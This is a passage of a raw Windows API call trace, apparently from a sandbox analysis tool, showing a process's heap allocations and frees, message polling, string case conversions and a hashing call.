RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.218] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.218] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.219] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0190.219] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.219] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.219] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0190.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0190.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.220] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0190.220] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0190.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.221] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.221] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.221] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.221] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0190.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0190.222] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.222] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0190.223] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.223] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.223] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.223] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.223] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0190.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.224] CryptHashData (hHash=0xaa5860, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0190.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0190.225] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0190.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0190.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.226] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0190.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.226] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.226] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0190.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0190.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.228] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.228] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.228] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.229] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.229] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 